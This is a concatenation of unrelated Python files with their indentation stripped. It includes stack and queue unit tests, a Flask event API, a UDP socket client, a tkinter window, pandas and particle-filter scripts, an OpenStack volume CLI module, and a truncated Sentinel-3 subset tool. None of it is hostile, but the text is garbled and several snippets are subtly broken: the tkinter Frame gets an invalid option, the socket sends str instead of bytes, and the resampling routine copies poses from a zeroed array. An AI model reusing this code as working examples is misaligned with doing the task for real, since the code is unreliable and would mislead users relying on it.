def test_push_one_entry_stack(self):
self.__stack.push('Data')
self.assertEqual('[ Data ]', str(self.__stack))
def test_push_three_entry_stack(self):
self.__stack.push('Rocks')
self.__stack.push('Structures')
self.__stack.push('Data')
self.assertEqual('[ Data, Structures, Rocks ]', str(self.__stack))
# Pop Tests
def test_pop_no_entry_stack(self):
returned = self.__stack.pop()
self.assertEqual(None, returned)
def test_pop_no_entry_stack_not_modified(self):
self.__stack.pop()
self.assertEqual('[ ]', str(self.__stack))
def test_pop_one_entry_stack(self):
self.__stack.push('Data')
self.__stack.pop()
self.assertEqual('[ ]', str(self.__stack))
def test_pop_one_entry_stack_returned_value(self):
self.__stack.push('Data')
returned = self.__stack.pop()
self.assertEqual('Data', returned)
def test_pop_three_entry_stack(self):
self.__stack.push('Rocks')
self.__stack.push('Structures')
self.__stack.push('Data')
self.__stack.pop()
self.assertEqual('[ Structures, Rocks ]', str(self.__stack))
def test_pop_two_entry_stack_returned_value(self):
self.__stack.push('Rocks')
self.__stack.push('Structures')
self.__stack.push('Data')
returned = self.__stack.pop()
self.assertEqual('Data', returned)
def test_pop_two_three_entry_stack(self):
self.__stack.push('Rocks')
self.__stack.push('Structures')
self.__stack.push('Data')
self.__stack.pop()
self.__stack.pop()
self.assertEqual('[ Rocks ]', str(self.__stack))
def test_pop_two_three_entry_stack_first_returned_value(self):
self.__stack.push('Rocks')
self.__stack.push('Structures')
self.__stack.push('Data')
returned = self.__stack.pop()
self.__stack.pop()
self.assertEqual('Data', returned)
def test_pop_two_three_entry_stack_second_returned_value(self):
self.__stack.push('Rocks')
self.__stack.push('Structures')
self.__stack.push('Data')
self.__stack.pop()
returned = self.__stack.pop()
self.assertEqual('Structures', returned)
# Peek Tests
def test_peek_no_entry_stack(self):
returned = self.__stack.peek()
self.assertEqual(None, returned)
def test_peek_one_entry_stack(self):
self.__stack.push('Data')
returned = self.__stack.peek()
self.assertEqual('Data', returned)
def test_peek_three_entry_stack(self):
self.__stack.push('Rocks')
self.__stack.push('Structures')
self.__stack.push('Data')
returned = self.__stack.peek()
self.assertEqual('Data', returned)
def test_peek_not_modified_stack(self):
self.__stack.push('Data')
self.__stack.peek()
self.assertEqual('[ Data ]', str(self.__stack))
# Queue Tests
# Empty List Test
def test_empty_queue(self):
self.assertEqual('[ ]', str(self.__queue))
# Length Tests
def test_length_no_entry_queue(self):
self.assertEqual(0, len(self.__queue))
def test_length_one_entry_queue(self):
self.__queue.enqueue('Data')
self.assertEqual(1, len(self.__queue))
def test_length_three_entry_queue(self):
self.__queue.enqueue('Data')
self.__queue.enqueue('Structures')
self.__queue.enqueue('Rocks')
self.assertEqual(3, len(self.__queue))
# Enqueue Tests
def test_enqueue_one_entry_queue(self):
self.__queue.enqueue('Data')
self.assertEqual('[ Data ]', str(self.__queue))
def test_enqueue_three_entry_queue(self):
self.__queue.enqueue('Data')
self.__queue.enqueue('Structures')
self.__queue.enqueue('Rocks')
self.assertEqual('[ Data, Structures, Rocks ]', str(self.__queue))
# Dequeue Tests
def test_dequeue_no_entry_queue(self):
returned = self.__queue.dequeue()
self.assertEqual(None, returned)
def test_dequeue_no_entry_queue_not_modified(self):
self.__queue.dequeue()
self.assertEqual('[ ]', str(self.__queue))
def test_dequeue_one_entry_queue(self):
self.__queue.enqueue('Data')
self.__queue.dequeue()
self.assertEqual('[ ]', str(self.__queue))
def test_dequeue_one_entry_queue_returned_value(self):
self.__queue.enqueue('Data')
returned = self.__queue.dequeue()
self.assertEqual('Data', returned)
def test_dequeue_three_entry_queue(self):
self.__queue.enqueue('Data')
self.__queue.enqueue('Structures')
self.__queue.enqueue('Rocks')
self.__queue.dequeue()
self.assertEqual('[ Structures, Rocks ]', str(self.__queue))
def test_dequeue_three_entry_queue_returned_value(self):
self.__queue.enqueue('Data')
self.__queue.enqueue('Structures')
self.__queue.enqueue('Rocks')
returned = self.__queue.dequeue()
self.assertEqual('Data', returned)
def test_dequeue_two_three_entry_queue(self):
self.__queue.enqueue('Data')
self.__queue.enqueue('Structures')
self.__queue.enqueue('Rocks')
self.__queue.dequeue()
self.__queue.dequeue()
self.assertEqual('[ Rocks ]', str(self.__queue))
def test_dequeue_two_three_entry_queue_first_returned_value(self):
self.__queue.enqueue('Data')
self.__queue.enqueue('Structures')
self.__queue.enqueue('Rocks')
returned = self.__queue.dequeue()
self.__queue.dequeue()
self.assertEqual('Data', returned)
def test_dequeue_two_three_entry_queue_second_returned_value(self):
self.__queue.enqueue('Data')
self.__queue.enqueue('Structures')
self.__queue.enqueue('Rocks')
self.__queue.dequeue()
returned = self.__queue.dequeue()
self.assertEqual('Structures', returned)
if __name__ == '__main__':
unittest.main() |
from uuid import UUID
from flask import request
from flask_restplus import Namespace, Resource, fields
import config
from mappers.event_mappers import EventResponseSchema, TotalByTypeResponseSchema
from repository.event_repo import EventRepo
from shared import response_object as res
from shared.enum.order_enum import OrderType
from use_cases.event import event_request_objects as req
from use_cases.event import event_use_cases as uc
api = Namespace('Event', description='Event endpoints for Remarkably Code Test')
STATUS_CODES = {
res.ResponseSuccess.SUCCESS: 200,
res.ResponseFailure.RESOURCE_ERROR: 404,
res.ResponseFailure.PARAMETERS_ERROR: 400,
res.ResponseFailure.BUSINESS_ERROR: 400,
res.ResponseFailure.SYSTEM_ERROR: 500
}
# SWAGGER DOC
event_model = api.model('Event model', {
'id': fields.String(description='event id'),
'item': fields.String(description='move out item id'),
'detail': fields.String(description='Details about event'),
'type': fields.String(description='Type of an event'),
'created': fields.DateTime(description='Date of event creation')
})
create_event_model = api.model('Create event model', {
'item': fields.String(description='move out item id'),
'detail': fields.String(description='Details about event'),
'type': fields.String(description='Type of an event'),
})
event_total_by_type_model = api.model('Total events by type model', {
'system': fields.Integer(description='System event total'),
'external': fields.Integer(description='External event total'),
'staff': fields.Integer(description='Staff event total'),
'user': fields.Integer(description='User event total'),
'unknown': fields.Integer(description='Unknown event total')
})
@api.route('')
class Event(Resource):
@api.response(200, 'Success', event_model)
@api.response(404, 'Resource error')
@api.response(400, 'Parameters error')
@api.response(500, 'System error')
@api.expect(create_event_model)
# POST new event into database
def post(self):
if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
return api.abort(401, 'You are not allowed to get data from endpoint')
# Get event data
event = request.get_json()
request_object = req.SaveEventRequestObject.from_dict(adict=event)
use_case = uc.SaveEventUseCase(EventRepo())
response = use_case.execute(request_object)
if not response:
api.abort(STATUS_CODES[response.type],
response.message,
error_code=response.error_code,
error_key=response.error_key,
error_params=response.error_params)
result = EventResponseSchema().dump(response.value)
return result
def get(self):
if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
return api.abort(401, 'You are not allowed to get data from endpoint')
filter_params = {
'sort': request.args.get('sort', default=OrderType.DESCENDING, type=OrderType)
}
request_object = req.GetEventsRequestObject.from_filter_list(filter_params)
use_case = uc.GetEventsUseCase(EventRepo())
response = use_case.execute(request_object)
if not response:
api.abort(STATUS_CODES[response.type],
response.message,
error_code=response.error_code,
error_key=response.error_key,
error_params=response.error_params)
result = EventResponseSchema(many=True).dump(response.value)
return result
@api.route('/<string:uuid>')
class SpecificEvent(Resource):
@api.response(200, 'Success', event_model)
@api.response(404, 'Resource error')
@api.response(400, 'Parameters error')
@api.response(500, 'System error')
# GET specific event from database
def get(self, uuid):
if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
return api.abort(401, 'You are not allowed to get data from endpoint')
try:
uuid = UUID(uuid)
except ValueError:
return api.abort(400, 'Wrong input data provided')
request_object = req.GetEventRequestObject.from_uuid(uuid=uuid)
use_case = uc.GetEventUseCase(EventRepo())
response = use_case.execute(request_object)
if not response:
api.abort(STATUS_CODES[response.type],
response.message,
error_code=response.error_code,
error_key=response.error_key,
error_params=response.error_params)
result = EventResponseSchema().dump(response.value)
return result
@api.route('/specificitem/<string:uuid>')
class SpecificEvent(Resource):
@api.response(200, 'Success', [event_model])
@api.response(404, 'Resource error')
@api.response(400, 'Parameters error')
@api.response(500, 'System error')
# GET all events for specific item from database
def get(self, uuid):
if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
return api.abort(401, 'You are not allowed to get data from this endpoint')
try:
uuid = UUID(uuid)
except ValueError:
return api.abort(400, 'Wrong input data provided')
request_object = req.GetEventForSpecificItemRequestObject.from_uuid(uuid=uuid)
use_case = uc.GetEventForSpecificItemUseCase(EventRepo())
response = use_case.execute(request_object)
if not response:
api.abort(STATUS_CODES[response.type],
response.message,
error_code=response.error_code,
error_key=response.error_key,
error_params=response.error_params)
result = EventResponseSchema(many=True).dump(response.value)
return result
@api.route('/totalbytype')
class SpecificEvent(Resource):
@api.response(200, 'Success', event_total_by_type_model)
@api.response(404, 'Resource error')
@api.response(400, 'Parameters error')
@api.response(500, 'System error')
# GET count of events by type from database
def get(self):
if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
return api.abort(401, 'You are not allowed to get data from endpoint')
use_case = uc.GetTotalEventsByTypeUseCase(EventRepo())
response = use_case.execute()
if not response:
api.abort(STATUS_CODES[response.type],
response.message,
error_code=response.error_code,
error_key=response.error_key,
error_params=response.error_params)
result = TotalByTypeResponseSchema().dump(response.value)
return result
@api.route('/oldestevent')
class SpecificEvent(Resource):
@api.response(200, 'Success', event_model)
@api.response(404, 'Resource error')
@api.response(400, 'Parameters error')
@api.response(500, 'System error')
# GET oldest event from database
def get(self):
if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
return api.abort(401, 'You are not allowed to get data from endpoint')
use_case = uc.OldestEventUseCase(EventRepo())
response = use_case.execute()
if not response:
api.abort(STATUS_CODES[response.type],
response.message,
error_code=response.error_code,
error_key=response.error_key,
error_params=response.error_params)
result = EventResponseSchema().dump(response.value)
return result
@api.route('/newestevent')
class SpecificEvent(Resource):
@api.response(200, 'Success', event_model)
@api.response(404, 'Resource error')
@api.response(400, 'Parameters error')
@api.response(500, 'System error')
# GET newest event from database
def get(self):
if request.headers.get('Secret') != config.BaseConfig.SECRET_KEY:
return api.abort(401, 'You are not allowed to get data from endpoint')
use_case = uc.NewestEventUseCase(EventRepo())
response = use_case.execute()
if not response:
api.abort(STATUS_CODES[response.type],
response.message,
error_code=response.error_code,
error_key=response.error_key,
error_params=response.error_params)
result = EventResponseSchema().dump(response.value)
return result
|
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print('I am connecting the server!')
for xx in ['aBch','f服务d','h7Tq','.']:
s.sendto(xx,('192.168.3.13',8088))
str1,addr=s.recvfrom(1024)
str2=str(str1,encoding='utf-8')
print(s.recv(1024).decode('utf-8'))
s.close()
|
import tkinter as tk
root = tk.Tk()
frame1 = tk.Frame(root, text = "Frame 1")
frame1.pack()
frame2 = tk.Frame(root, text = "Frame 2")
frame2.pack()
root.mainloop() |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Select from accident data the rows with those street names that are in traffic data
import pandas as pd
import numpy as np
df_accidents = pd.read_csv('data/5_accidents.csv')
df_road_usages = pd.read_csv('data/4_road_usages.csv')
roads = list(df_road_usages.nimi.unique())
#print(roads)
#print(len(df_accidents))
df_selected_accidents = df_accidents[df_accidents.Katuosoite.isin(roads)]
#print(len(df_selected_accidents))
df_selected_accidents.insert(loc = 0, column = 'a-index', value = np.arange(len(df_selected_accidents)))
df_selected_accidents.to_csv('data/6_accidents.csv', index = False)
|
def resample_particles(particle_poses, particle_weights, num_particles):
# particle_poses = particle poses
# particle_weights = particle weights
# num_particles = number of particles
# keep count of total number of particles
count_num_particles = 0
# iterate through all particles
particle_weight = particle_weights[0, 0]
# initialize variables to store resampled particle poses and weights
resampled_particle_poses = np.zeros((3, num_particles))
resampled_particle_weights = np.tile(1 / num_particles, num_particles).reshape(1, num_particles)
for i in range(num_particles):
# intitilize a uniform distribution fo weights based on number of particles
uniform_distribution = np.random.uniform(0, 1 / num_particles)
# particle weights with uniform distribution
uniform_particle_weight = uniform_distribution + i / num_particles
# if uniform particle weight is greater than the current particle weight, add more weight to
# the particle until it has greater weight than the initialized base uniformly distributed weights
while uniform_particle_weight > particle_weight:
count_num_particles += 1
particle_weight = particle_weight + particle_weights[0, count_num_particles]
# resize particle_poses storage variable based on number of particles
resampled_particle_poses[:, i] = resampled_particle_poses[:, count_num_particles]
return resampled_particle_poses, resampled_particle_weights
|
# Copyright 2012-2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Volume v1 Volume action implementations"""
import argparse
import functools
import logging
from cliff import columns as cliff_columns
from osc_lib.cli import format_columns
from osc_lib.cli import parseractions
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from openstackclient.i18n import _
LOG = logging.getLogger(__name__)
class AttachmentsColumn(cliff_columns.FormattableColumn):
"""Formattable column for attachments column.
Unlike the parent FormattableColumn class, the initializer of the
class takes server_cache as the second argument.
osc_lib.utils.get_item_properties instantiate cliff FormattableColumn
object with a single parameter "column value", so you need to pass
a partially initialized class like
``functools.partial(AttachmentsColumn, server_cache)``.
"""
def __init__(self, value, server_cache=None):
super(AttachmentsColumn, self).__init__(value)
self._server_cache = server_cache or {}
def human_readable(self):
"""Return a formatted string of a volume's attached instances
:rtype: a string of formatted instances
"""
msg = ''
for attachment in self._value:
server = attachment['server_id']
if server in self._server_cache.keys():
server = self._server_cache[server].name
device = attachment['device']
msg += 'Attached to %s on %s ' % (server, device)
return msg
def _check_size_arg(args):
"""Check whether --size option is required or not.
Require size parameter only in case when snapshot or source
volume is not specified.
"""
if (args.snapshot or args.source) is None and args.size is None:
msg = _(
"--size is a required option if snapshot "
"or source volume is not specified."
)
raise exceptions.CommandError(msg)
class CreateVolume(command.ShowOne):
_description = _("Create new volume")
def get_parser(self, prog_name):
parser = super(CreateVolume, self).get_parser(prog_name)
parser.add_argument(
'name',
metavar='<name>',
help=_('Volume name'),
)
parser.add_argument(
'--size',
metavar='<size>',
type=int,
help=_(
"Volume size in GB (Required unless --snapshot or "
"--source is specified)"
),
)
parser.add_argument(
'--type',
metavar='<volume-type>',
help=_("Set the type of volume"),
)
source_group = parser.add_mutually_exclusive_group()
source_group.add_argument(
'--image',
metavar='<image>',
help=_('Use <image> as source of volume (name or ID)'),
)
source_group.add_argument(
'--snapshot',
metavar='<snapshot>',
help=_('Use <snapshot> as source of volume (name or ID)'),
)
source_group.add_argument(
'--snapshot-id',
metavar='<snapshot-id>',
help=argparse.SUPPRESS,
)
source_group.add_argument(
'--source',
metavar='<volume>',
help=_('Volume to clone (name or ID)'),
)
parser.add_argument(
'--description',
metavar='<description>',
help=_('Volume description'),
)
parser.add_argument(
'--user',
metavar='<user>',
help=_('Specify an alternate user (name or ID)'),
)
parser.add_argument(
'--project',
metavar='<project>',
help=_('Specify an alternate project (name or ID)'),
)
parser.add_argument(
'--availability-zone',
metavar='<availability-zone>',
help=_('Create volume in <availability-zone>'),
)
parser.add_argument(
'--property',
metavar='<key=value>',
action=parseractions.KeyValueAction,
help=_(
'Set a property on this volume '
'(repeat option to set multiple properties)'
),
)
bootable_group = parser.add_mutually_exclusive_group()
bootable_group.add_argument(
"--bootable",
action="store_true",
help=_("Mark volume as bootable"),
)
bootable_group.add_argument(
"--non-bootable",
action="store_true",
help=_("Mark volume as non-bootable (default)"),
)
readonly_group = parser.add_mutually_exclusive_group()
readonly_group.add_argument(
"--read-only",
action="store_true",
help=_("Set volume to read-only access mode"),
)
readonly_group.add_argument(
"--read-write",
action="store_true",
help=_("Set volume to read-write access mode (default)"),
)
return parser
def take_action(self, parsed_args):
_check_size_arg(parsed_args)
identity_client = self.app.client_manager.identity
image_client = self.app.client_manager.image
volume_client = self.app.client_manager.volume
source_volume = None
if parsed_args.source:
source_volume = utils.find_resource(
volume_client.volumes,
parsed_args.source,
).id
project = None
if parsed_args.project:
project = utils.find_resource(
identity_client.tenants,
parsed_args.project,
).id
user = None
if parsed_args.user:
user = utils.find_resource(
identity_client.users,
parsed_args.user,
).id
image = None
if parsed_args.image:
image = utils.find_resource(
image_client.images,
parsed_args.image,
).id
snapshot = parsed_args.snapshot or parsed_args.snapshot_id
volume = volume_client.volumes.create(
parsed_args.size,
snapshot,
source_volume,
parsed_args.name,
parsed_args.description,
parsed_args.type,
user,
project,
parsed_args.availability_zone,
parsed_args.property,
image,
)
if parsed_args.bootable or parsed_args.non_bootable:
try:
if utils.wait_for_status(
volume_client.volumes.get,
volume.id,
success_status=['available'],
error_status=['error'],
sleep_time=1,
):
volume_client.volumes.set_bootable(
volume.id, parsed_args.bootable
)
else:
msg = _(
"Volume status is not available for setting boot "
"state"
)
raise exceptions.CommandError(msg)
except Exception as e:
LOG.error(_("Failed to set volume bootable property: %s"), e)
if parsed_args.read_only or parsed_args.read_write:
try:
if utils.wait_for_status(
volume_client.volumes.get,
volume.id,
success_status=['available'],
error_status=['error'],
sleep_time=1,
):
volume_client.volumes.update_readonly_flag(
volume.id, parsed_args.read_only
)
else:
msg = _(
"Volume status is not available for setting it"
"read only."
)
raise exceptions.CommandError(msg)
except Exception as e:
LOG.error(
_(
"Failed to set volume read-only access "
"mode flag: %s"
),
e,
)
# Map 'metadata' column to 'properties'
volume._info.update(
{
'properties': format_columns.DictColumn(
volume._info.pop('metadata')
),
'type': volume._info.pop('volume_type'),
},
)
# Replace "display_name" by "name", keep consistent in v1 and v2
if 'display_name' in volume._info:
volume._info.update({'name': volume._info.pop('display_name')})
volume_info = utils.backward_compat_col_showone(
volume._info, parsed_args.columns, {'display_name': 'name'}
)
return zip(*sorted(volume_info.items()))
class DeleteVolume(command.Command):
_description = _("Delete volume(s)")
def get_parser(self, prog_name):
parser = super(DeleteVolume, self).get_parser(prog_name)
parser.add_argument(
'volumes',
metavar='<volume>',
nargs="+",
help=_('Volume(s) to delete (name or ID)'),
)
parser.add_argument(
'--force',
action='store_true',
default=False,
help=_(
'Attempt forced removal of volume(s), regardless of state '
'(defaults to False)'
),
)
return parser
def take_action(self, parsed_args):
volume_client = self.app.client_manager.volume
result = 0
for i in parsed_args.volumes:
try:
volume_obj = utils.find_resource(volume_client.volumes, i)
if parsed_args.force:
volume_client.volumes.force_delete(volume_obj.id)
else:
volume_client.volumes.delete(volume_obj.id)
except Exception as e:
result += 1
LOG.error(
_(
"Failed to delete volume with "
"name or ID '%(volume)s': %(e)s"
),
{'volume': i, 'e': e},
)
if result > 0:
total = len(parsed_args.volumes)
msg = _("%(result)s of %(total)s volumes failed " "to delete.") % {
'result': result,
'total': total,
}
raise exceptions.CommandError(msg)
class ListVolume(command.Lister):
_description = _("List volumes")
def get_parser(self, prog_name):
parser = super(ListVolume, self).get_parser(prog_name)
parser.add_argument(
'--name',
metavar='<name>',
help=_('Filter results by volume name'),
)
parser.add_argument(
'--status',
metavar='<status>',
help=_('Filter results by status'),
)
parser.add_argument(
'--all-projects',
action='store_true',
default=False,
help=_('Include all projects (admin only)'),
)
parser.add_argument(
'--long',
action='store_true',
default=False,
help=_('List additional fields in output'),
)
parser.add_argument(
'--offset',
type=int,
action=parseractions.NonNegativeAction,
metavar='<offset>',
help=_('Index from which to start listing volumes'),
)
parser.add_argument(
'--limit',
type=int,
action=parseractions.NonNegativeAction,
metavar='<num-volumes>',
help=_('Maximum number of volumes to display'),
)
return parser
def take_action(self, parsed_args):
volume_client = self.app.client_manager.volume
compute_client = self.app.client_manager.compute
if parsed_args.long:
columns = (
'ID',
'Display Name',
'Status',
'Size',
'Volume Type',
'Bootable',
'Attachments',
'Metadata',
)
column_headers = (
'ID',
'Name',
'Status',
'Size',
'Type',
'Bootable',
'Attached to',
'Properties',
)
else:
columns = (
'ID',
'Display Name',
'Status',
'Size',
'Attachments',
)
column_headers = (
'ID',
'Name',
'Status',
'Size',
'Attached to',
)
# Cache the server list
server_cache = {}
try:
for s in compute_client.servers.list():
server_cache[s.id] = s
except Exception:
# Just forget it if there's any trouble
pass
AttachmentsColumnWithCache = functools.partial(
AttachmentsColumn, server_cache=server_cache
)
search_opts = {
'all_tenants': parsed_args.all_projects,
'display_name': parsed_args.name,
'status': parsed_args.status,
}
if parsed_args.offset:
search_opts['offset'] = parsed_args.offset
data = volume_client.volumes.list(
search_opts=search_opts,
limit=parsed_args.limit,
)
column_headers = utils.backward_compat_col_lister(
column_headers, parsed_args.columns, {'Display Name': 'Name'}
)
return (
column_headers,
(
utils.get_item_properties(
s,
columns,
formatters={
'Metadata': format_columns.DictColumn,
'Attachments': AttachmentsColumnWithCache,
},
)
for s in data
),
)
class MigrateVolume(command.Command):
_description = _("Migrate volume to a new host")
def get_parser(self, prog_name):
parser = super(MigrateVolume, self).get_parser(prog_name)
parser.add_argument(
'volume',
metavar="<volume>",
help=_("Volume to migrate (name or ID)"),
)
parser.add_argument(
'--host',
metavar="<host>",
required=True,
help=_(
"Destination host (takes the form: host@backend-name#pool)"
),
)
parser.add_argument(
'--force-host-copy',
action="store_true",
help=_(
"Enable generic host-based force-migration, "
"which bypasses driver optimizations"
),
)
return parser
def take_action(self, parsed_args):
volume_client = self.app.client_manager.volume
volume = utils.find_resource(volume_client.volumes, parsed_args.volume)
volume_client.volumes.migrate_volume(
volume.id,
parsed_args.host,
parsed_args.force_host_copy,
)
class SetVolume(command.Command):
_description = _("Set volume properties")
def get_parser(self, prog_name):
parser = super(SetVolume, self).get_parser(prog_name)
parser.add_argument(
'volume',
metavar='<volume>',
help=_('Volume to modify (name or ID)'),
)
parser.add_argument(
'--name',
metavar='<name>',
help=_('New volume name'),
)
parser.add_argument(
'--description',
metavar='<description>',
help=_('New volume description'),
)
parser.add_argument(
'--size',
metavar='<size>',
type=int,
help=_('Extend volume size in GB'),
)
parser.add_argument(
"--no-property",
dest="no_property",
action="store_true",
help=_(
"Remove all properties from <volume> "
"(specify both --no-property and --property to "
"remove the current properties before setting "
"new properties.)"
),
)
parser.add_argument(
'--property',
metavar='<key=value>',
action=parseractions.KeyValueAction,
help=_(
'Set a property on this volume '
'(repeat option to set multiple properties)'
),
)
bootable_group = parser.add_mutually_exclusive_group()
bootable_group.add_argument(
"--bootable",
action="store_true",
help=_("Mark volume as bootable"),
)
bootable_group.add_argument(
"--non-bootable",
action="store_true",
help=_("Mark volume as non-bootable"),
)
readonly_group = parser.add_mutually_exclusive_group()
readonly_group.add_argument(
"--read-only",
action="store_true",
help=_("Set volume to read-only access mode"),
)
readonly_group.add_argument(
"--read-write",
action="store_true",
help=_("Set volume to read-write access mode"),
)
return parser
def take_action(self, parsed_args):
volume_client = self.app.client_manager.volume
volume = utils.find_resource(volume_client.volumes, parsed_args.volume)
result = 0
if parsed_args.size:
try:
if volume.status != 'available':
msg = (
_(
"Volume is in %s state, it must be available "
"before size can be extended"
)
% volume.status
)
raise exceptions.CommandError(msg)
if parsed_args.size <= volume.size:
msg = (
_("New size must be greater than %s GB") % volume.size
)
raise exceptions.CommandError(msg)
volume_client.volumes.extend(volume.id, parsed_args.size)
except Exception as e:
LOG.error(_("Failed to set volume size: %s"), e)
result += 1
if parsed_args.no_property:
try:
volume_client.volumes.delete_metadata(
volume.id, volume.metadata.keys()
)
except Exception as e:
LOG.error(_("Failed to clean volume properties: %s"), e)
result += 1
if parsed_args.property:
try:
volume_client.volumes.set_metadata(
volume.id, parsed_args.property
)
except Exception as e:
LOG.error(_("Failed to set volume property: %s"), e)
result += 1
if parsed_args.bootable or parsed_args.non_bootable:
try:
volume_client.volumes.set_bootable(
volume.id, parsed_args.bootable
)
except Exception as e:
LOG.error(_("Failed to set volume bootable property: %s"), e)
result += 1
if parsed_args.read_only or parsed_args.read_write:
try:
volume_client.volumes.update_readonly_flag(
volume.id, parsed_args.read_only
)
except Exception as e:
LOG.error(
_(
"Failed to set volume read-only access "
"mode flag: %s"
),
e,
)
result += 1
kwargs = {}
if parsed_args.name:
kwargs['display_name'] = parsed_args.name
if parsed_args.description:
kwargs['display_description'] = parsed_args.description
if kwargs:
try:
volume_client.volumes.update(volume.id, **kwargs)
except Exception as e:
LOG.error(
_(
"Failed to update volume display name "
"or display description: %s"
),
e,
)
result += 1
if result > 0:
raise exceptions.CommandError(
_("One or more of the " "set operations failed")
)
class ShowVolume(command.ShowOne):
_description = _("Show volume details")
def get_parser(self, prog_name):
parser = super(ShowVolume, self).get_parser(prog_name)
parser.add_argument(
'volume',
metavar='<volume>',
help=_('Volume to display (name or ID)'),
)
return parser
def take_action(self, parsed_args):
volume_client = self.app.client_manager.volume
volume = utils.find_resource(volume_client.volumes, parsed_args.volume)
# Map 'metadata' column to 'properties'
volume._info.update(
{
'properties': format_columns.DictColumn(
volume._info.pop('metadata')
),
'type': volume._info.pop('volume_type'),
},
)
if 'os-vol-tenant-attr:tenant_id' in volume._info:
volume._info.update(
{
'project_id': volume._info.pop(
'os-vol-tenant-attr:tenant_id'
)
}
)
# Replace "display_name" by "name", keep consistent in v1 and v2
if 'display_name' in volume._info:
volume._info.update({'name': volume._info.pop('display_name')})
volume_info = utils.backward_compat_col_showone(
volume._info, parsed_args.columns, {'display_name': 'name'}
)
return zip(*sorted(volume_info.items()))
class UnsetVolume(command.Command):
_description = _("Unset volume properties")
def get_parser(self, prog_name):
parser = super(UnsetVolume, self).get_parser(prog_name)
parser.add_argument(
'volume',
metavar='<volume>',
help=_('Volume to modify (name or ID)'),
)
parser.add_argument(
'--property',
metavar='<key>',
action='append',
help=_(
'Remove a property from volume '
'(repeat option to remove multiple properties)'
),
)
return parser
def take_action(self, parsed_args):
volume_client = self.app.client_manager.volume
volume = utils.find_resource(volume_client.volumes, parsed_args.volume)
if parsed_args.property:
volume_client.volumes.delete_metadata(
volume.id,
parsed_args.property,
)
|
def solution(arr, cmds):
answer = []
for i1, i2, i in cmds:
answer.append(sorted(arr[i1-1:i2])[i-1])
return answer
print(solution([1, 5, 2, 6, 3, 7, 4], [[2, 5, 3], [4, 4, 1], [1, 7, 3]]))
|
"""
Subset Tool eopy.dataIO.Product.Product for Sentinel-3 data, subclass of AbstractProcessingTool
"""
'''___Built-In Modules___'''
import sys
from os.path import dirname, basename
from os.path import join as pjoin
'''___Third-Party Modules___'''
'''___NPL Modules___'''
dataProcessing_directory = dirname(dirname(dirname(dirname(__file__))))
sys.path.append(dataProcessing_directory)
from AbstractProcessingTool import AbstractProcessingTool
sys.path.append(dirname(__file__))
from OLCIL1SubsetFactory import OLCIL1SubsetFactory
sys.path.append(pjoin(dirname(dirname(dirname(__file__))), "snappy_shared"))
from SnappySubsetFactory import SnappySubsetFactory
'''___Authorship___'''
__author__ = "Sam Hunt"
__created__ = "21/06/2017"
__credits__ = ["Andrew Banks", "Javier Gorrono", "Niall Origo", "Tracy Scanlon"]
__version__ = "0.0"
__maintainer__ = "Sam Hunt"
__email__ = "sam.hunt@npl.co.uk"
__status__ = "Development"
class Sentinel3SubsetTool(AbstractProcessingTool):
"""
Sentinel3SubsetTool is a sub-class of AbstractProcessingTool for returning a subset of a Sentinel-3 data product,
e.g. a region of interest
:Attributes:
.. py:attribute:: processingFactory
*obj*
Instance of sub-class of *eopy.dataProcessing.AbstractProcessingTool.AbstractProcessingTool* for
processing for converting given Sentinel-3 data with units of radiance to reflectance
:Methods:
.. py:method:: setProcessingFactory(...):
Return the appropriate processing factory for a Sentinel-3 *eopy.dataIO.Product.Product* object.
*If no suitable factory in processor implementation available returns None*
:Inherited from eopy.dataProcessing.AbstractProcessingTool.AbstractProcessingTool:
.. py:method:: __init__(...):
Finds suitable processing factory for ``product_string`` if possible
.. py:method:: processProduct(...):
Returns processed version of input *eopy.dataIO.Product.Product* object, using functionality from
processing factory
"""
def setProcessingFactory(self, product_string):
"""
Return the appropriate processing factory for a Sentinel-3 *eopy.dataIO.Product.Product* object.
:type product_string: str
:param product_string: *eopy.dataIO.Product.Product* object "product_string" entry of its attributes dictionary
:return:
:ProcessingFactory: *cls*
Processing Factory suitable for Sentinel-3 *eopy.dataIO.Product.Product* object.
*If no suitable processing factory in processor implementation available returns None*
"""
# Return suitable Sentinel-3 SubsetFactory depending on product_string
# OLCI L1 Radiance - Full Resolution / OLCI L1 Radiance - Reduced Resolution
if (product_string == "OL_1_EFR") or (product_string == "OL_1_ERR"):
return OLCIL1SubsetFactory
# OLCI L2 Water & Atmos Parameters - Full Resolution
if product_string == "OL_2_WFR":
# todo - Write specific subset factory for OL_2_WFR type products?
return SnappySubsetFactory
# OLCI L2 Land & Atmos Parameters - Full Resolution
if product_string == "OL_2_LFR":
# todo - Write specific subset factory for OL_2_LFR type products?
return SnappySubsetFactory
# OLCI L2 Water & Atmos Parameters - Reduced Resolution
if product_string == "OL_2_WRR":
# todo - Write specific subset factory for OL_2_WRR type products?
return SnappySubsetFactory
# OLCI L2 Land & Atmos Parameters - Reduced Resolution
if product_string == "OL_2_LRR":
# todo - Write specific subset factory for OL_2_LRR type products?
return SnappySubsetFactory
# SLSTR L1 Radiance & Brightness Temperatures
if product_string == "SL_1_RBT":
# todo - Write specific subset factory for SL_1_RBT type products?
return SnappySubsetFactory
# SLSTR L2 Sea Surface Temperature
if product_string == "SL_2_WCT":
# todo - Write specific subset factory for SL_2_WCT type products?
return SnappySubsetFactory
# SLSTR L2 Sea Surface Temperature - GHRSTT like
if product_string == "SL_2_WST":
# todo - Write specific subset factory for SL_2_WST type products?
return SnappySubsetFactory
# SLSTR L2 Land Surface Temperature
if product_string == "SL_2_LST":
# todo - Write specific subset factory for SL_2_LST type products?
return SnappySubsetFactory
# Synergy - SLSTR and OLCI L1b ungridded bands
if product_string == "SY_1_SYN":
